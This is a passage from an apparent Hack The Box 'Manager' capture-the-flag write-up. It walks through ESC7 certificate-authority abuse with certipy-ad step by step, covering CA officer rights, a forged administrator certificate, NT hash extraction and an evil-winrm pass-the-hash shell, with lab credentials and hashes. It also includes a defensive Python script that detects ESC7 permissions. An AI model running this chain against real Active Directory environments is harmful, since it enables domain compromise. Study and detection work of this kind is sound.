└─$ certipy-ad ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -ca manager-dc01-ca -enable-template subca
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully enabled 'SubCA' on 'manager-dc01-ca'
List enabled certificate templates
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ certipy-ad ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -ca manager-dc01-ca -list-templates
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Enabled certificate templates on 'manager-dc01-ca':
SubCA
DirectoryEmailReplication
DomainControllerAuthentication
KerberosAuthentication
EFSRecovery
EFS
DomainController
WebServer
Machine
User
Administrator
Request a certificate from the SubCA template (the request is denied but saved as a pending request with an ID)
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ certipy-ad req -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -ca manager-dc01-ca -template SubCA -upn administrator@manager.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 15
Would you like to save the private key? (y/N) y
[*] Saved private key to 15.key
[-] Failed to request certificate
Add Manage Certificates again
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ certipy-ad ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -ca manager-dc01-ca -add-officer raven -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.11.236:636 - ssl
[+] Default path: DC=manager,DC=htb
[+] Configuration path: CN=Configuration,DC=manager,DC=htb
[+] Trying to get DCOM connection for: 10.10.11.236
[*] Successfully added officer 'Raven' on 'manager-dc01-ca'
Issue the pending certificate request (ID 15)
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ certipy-ad ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -ca manager-dc01-ca -issue-request 15
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate
Retrieve the issued certificate with the req command
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ certipy-ad req -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -ca manager-dc01-ca -retrieve 15
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Rerieving certificate with ID 15
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '15.key'
[*] Saved certificate and private key to 'administrator.pfx'
Authenticate with the certificate and dump the Administrator NT hash
certipy-ad auth -pfx administrator.pfx
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb':
aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
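Added example (mine, not from the writeup or from Certipy): a defender can spot the ESC7 condition from the same `certipy find -stdout` text shown above by checking who holds ManageCa / ManageCertificates on the CA. The two samples are constructed to match the Permissions blocks in this writeup (Raven with ManageCa only, then with ManageCertificates added by -add-officer); the trusted-admin allowlist is an assumption.

```python
"""Flag ESC7 exposure from the text output of `certipy find -stdout`."""
import re

# Principals expected to hold CA-management rights (assumption: adjust to the
# environment). Anyone else with ManageCa or ManageCertificates is a finding.
TRUSTED_CA_ADMINS = {"Administrators", "Domain Admins", "Enterprise Admins"}

# Constructed sample shaped like the first certipy run in the writeup:
# Raven holds ManageCa but not ManageCertificates.
FIND_BEFORE = r"""
Certificate Authorities
  0
    CA Name                             : manager-DC01-CA
    DNS Name                            : dc01.manager.htb
    Permissions
      Owner                             : MANAGER.HTB\Administrators
      Access Rights
        Enroll                          : MANAGER.HTB\Operator
                                          MANAGER.HTB\Authenticated Users
                                          MANAGER.HTB\Raven
        ManageCertificates              : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
        ManageCa                        : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
                                          MANAGER.HTB\Raven
[!] Vulnerabilities
  ESC7                                  : 'MANAGER.HTB\\Raven' has dangerous permissions
"""
# Same CA after Raven was added as a CA officer (ManageCertificates), as in
# the second certipy run of the writeup.
FIND_AFTER = FIND_BEFORE.replace(
    "Enterprise Admins\n        ManageCa",
    "Enterprise Admins\n        MANAGER.HTB\\Raven\n        ManageCa",
)


def parse_access_rights(find_output):
    """Return {right_name: [principal, ...]} from the first CA's Access Rights block."""
    rights, current, in_block = {}, None, False
    for raw in find_output.splitlines():
        line = raw.strip()
        if line == "Access Rights":
            in_block = True
            continue
        if not in_block:
            continue
        if not line or line.startswith("[") or line.startswith("Certificate Templates"):
            break  # end of the Permissions block
        m = re.match(r"^([A-Za-z]+)\s*:\s*(\S.*)$", line)
        if m:
            current = m.group(1)
            rights[current] = [m.group(2).strip()]
        elif current is not None:
            rights[current].append(line)  # continuation line: another principal
    return rights


def short_name(principal):
    """'MANAGER.HTB\\Raven' -> 'Raven'."""
    return principal.rsplit("\\", 1)[-1]


def esc7_findings(rights, trusted=TRUSTED_CA_ADMINS):
    """List (principal, [rights held]) for non-trusted holders of CA-management rights.

    ManageCa alone is already ESC7: its holder can grant themselves
    ManageCertificates (officer) and then approve their own pending requests,
    which is exactly the chain in this writeup.
    """
    manage_ca = {short_name(p) for p in rights.get("ManageCa", [])}
    manage_certs = {short_name(p) for p in rights.get("ManageCertificates", [])}
    findings = []
    for who in sorted((manage_ca | manage_certs) - set(trusted)):
        held = [name for name, holders in (("ManageCa", manage_ca),
                                           ("ManageCertificates", manage_certs))
                if who in holders]
        findings.append((who, held))
    return findings


def audit(find_output):
    """Parse a certipy find dump and return the ESC7 findings."""
    return esc7_findings(parse_access_rights(find_output))


if __name__ == "__main__":
    for label, dump in (("before", FIND_BEFORE), ("after", FIND_AFTER)):
        print(label, audit(dump))
```

The same check belongs in a periodic job: a new officer or a newly enabled SubCA template appearing between two runs is the signal that the CA is being worked, and the fix is to remove ManageCa from any non-admin principal.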
Read flag: root.txt
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ evil-winrm -i manager.htb -u administrator -H ae5064c2f62317332c88629e025924ef
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 8/26/2024 10:45 PM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
0539a64061555aa1dc9475d92879de51
*Evil-WinRM* PS C:\Users\Administrator\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
===================== =============================================
manager\administrator S-1-5-21-4078382237-1492182817-2568127209-500
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================== ================ ============================================= ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MANAGER\Group Policy Creator Owners Group S-1-5-21-4078382237-1492182817-2568127209-520 Mandatory group, Enabled by default, Enabled group
MANAGER\Domain Admins Group S-1-5-21-4078382237-1492182817-2568127209-512 Mandatory group, Enabled by default, Enabled group
MANAGER\Enterprise Admins Group S-1-5-21-4078382237-1492182817-2568127209-519 Mandatory group, Enabled by default, Enabled group
MANAGER\Schema Admins Group S-1-5-21-4078382237-1492182817-2568127209-518 Mandatory group, Enabled by default, Enabled group
MANAGER\Denied RODC Password Replication Group Alias S-1-5-21-4078382237-1492182817-2568127209-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\Administrator\Desktop> iptables
The term 'iptables' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ iptables
+ ~~~~~~~~
+ CategoryInfo : ObjectNotFound: (iptables:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.11.236
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : 10.10.10.2
References
Lessons Learned